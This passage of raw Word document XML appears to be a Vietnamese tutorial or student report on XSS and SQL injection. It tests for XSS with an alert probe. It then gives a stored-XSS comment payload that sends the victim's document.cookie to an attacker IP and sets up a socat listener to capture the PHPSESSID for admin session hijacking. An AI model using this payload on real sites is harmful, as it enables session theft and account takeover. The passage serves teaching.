      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là hình thức tấn công đơn giản nhưng gây nhiều thiệt hại lớn đối với các website.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Hiện nay nó là một trong những kỹ thuật tấn công phổ biến nhất và được mệnh danh là Godfather of Attack,</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trong nhiều năm năm liền được liệt kê vào danh sách những kỹ thuật tấn công nguy hiểm nhất đối với ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A0624" w14:textId="406B6752" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Thông thường theo một cách đợn giản nhất,</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>để phát hiện website có bị nhiễm XSS hay không ta chỉ cần gõ đoạn mã</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:”&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">script&gt;alert(‘XSS’)&lt;/script&gt;” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>vào các vùng trống trên website chẳng hạn như:thanh tìm kiếm hay bình luận…Nếu màn hình website hiện thị thông báo trong đoạn mã mà bạn vừa nhập chứng tỏ trang web đó đã nhiễm XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A7C81" w14:textId="6DE5694A" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="34A66109">
          <v:shape id="Hình ảnh 1" o:spid="_x0000_i1074" type="#_x0000_t75" style="width:227.25pt;height:135pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId60" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01372A39" w14:textId="04C15B33" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">ꞏ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B7984" w14:textId="08D45B65" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Hiện nay,</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>nó được mô tả như là một trong những lỗ hổng bảo mật web nguy hiểm nhất. Khai thác Sql Injection, ngoài việc đoạt được quyền kiểm soát về mặt dữ liệu như đã nói ở trên, hacker còn có thể cài đặt backdoor trên server mà ứng dụng đang chạy, qua đó kiểm soát toàn bộ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD75FA3" w14:textId="68441B7C" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Các cuộc tấn công SQL Injection được thực hiện bằng cách gửi lệnh SQL độc hại đến các máy chủ cơ sở dữ liệu thông qua các yêu cầu của người dùng mà website cho phép. Bất kỳ thẻ input nào cũng có thể được sử dụng để gửi các lệnh độc hại, bao gồm các thẻ&lt;input&gt;, chuỗi truy vấn (query strings), cookie và tệp tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF5724" w14:textId="0F009201" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2211C6" w14:textId="5D05DBCA" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trước khi tiến hành khai thác lỗ hổng của một trang web, ta phải kiểm tra xem trang web đó có lỗ hổng nào hay không.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để biết trang web có nhiễm XSS hay không ta sử dụng đoạn mã sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10940C" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(‘XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/script&gt;. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi phát hiện trang web nhiệm XSS ta tiến hành khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C7642" w14:textId="219612E6" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Mục tiêu ở đây của chúng ta chính là lấy được cookie đăng nhập của nạn nhân,</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sao đó sử dụng một số thủ thuật để chiếm phiên đăng nhập,</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trở thành quản trị viên của trang web và tiến hành khai thác SQL để truy xuất thông tin username và password của quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21C361" w14:textId="6A517249" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta phải cố gắng chèn một đoạn script vào trong trang web của nạn nhân và phải thực thi được đoạn script đã chèn vào.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Cách tốt nhất để thực hiện điều đó chính là chèn mã độc vào trong phần nội dung bình luận của trang web.</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bằng cách </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>này,mỗi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> khi quản trị viên hay người sử dụng vô tình hay cố ý,bằng một cách nào đó mã độc được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69512E63" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta thêm vào phần bình của trang web với nội dung đoạn script như sau:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D771C" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;Script&gt;document.write(‘&lt;imgsrc</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=”http://ip/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?’+document.cookie+’ “/&gt;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F63A3" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261E1E5C" w14:textId="63E68057"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259BC522">
          <v:shape id="Hình ảnh 56" o:spid="_x0000_i1075" type="#_x0000_t75" style="width:389.25pt;height:143.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId61" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F8776" w14:textId="756E191A" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đoạn mã này có nhiệm vụ vô cùng đơn giản.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Mỗi khi người dùng gửi truy vấn nội dung của đoạn mã sẽ được thực thi,</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>thẻ img với URl chứa cookie của nạn nhân</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(kết nối bởi đoạn mã javascript).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CA41D" w14:textId="278A7558" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau đó trình duyệt sẽ cố gắng tải hình ảnh này,</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>mà URl của thẻ img lại chứa cookie của nạn nhân nên máy chủ độc hại</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(ở đây là máy chủ của tôi) có địa chỉ IP là 192.168.111.129 sẽ nhận được cookie của nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0DC42" w14:textId="22D42CA1" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Một khi mã độc được thực thi thành công ta tiến hành lấy PHPSESSID của nạn nhân.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta tìm hiểu một chút về PHPSESSID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE7CDD" w14:textId="1BC5F063" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>PHP session về bản chất là các tập tin trên server chứa các thông tin của các client.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây client thông thường chính là trình duyệt của người dùng.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tập tin session ứng với mỗi một </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>client(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trình duyệt) khác nhau sẽ có tên khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408D631" w14:textId="60075F30" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Có nhiều cách để lấy “php session” của nạn nhân.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FCE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tôi sử dụng lệnh SOCAT với cú pháp sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E0092" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>socat TCP-LISTEN:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80,reuseaddr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,fork –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38DB06" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Socat là một tiện ích dựa trên dòng lệnh thiết lập hai luồng byte hai chiều và truyền dữ liệu giữa chúng. Bởi vì các luồng có thể được xây dựng từ một tập hợp lớn các loại ổ và nguồn dữ liệu khác nhau (xem các loại địa chỉ) và vì nhiều tùy chọn địa chỉ có thể được áp dụng cho các luồng, nên socat có thể được sử dụng cho nhiều mục đích khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063743EF" w14:textId="0A83FBEF" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để sử dụng SOCAT,</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
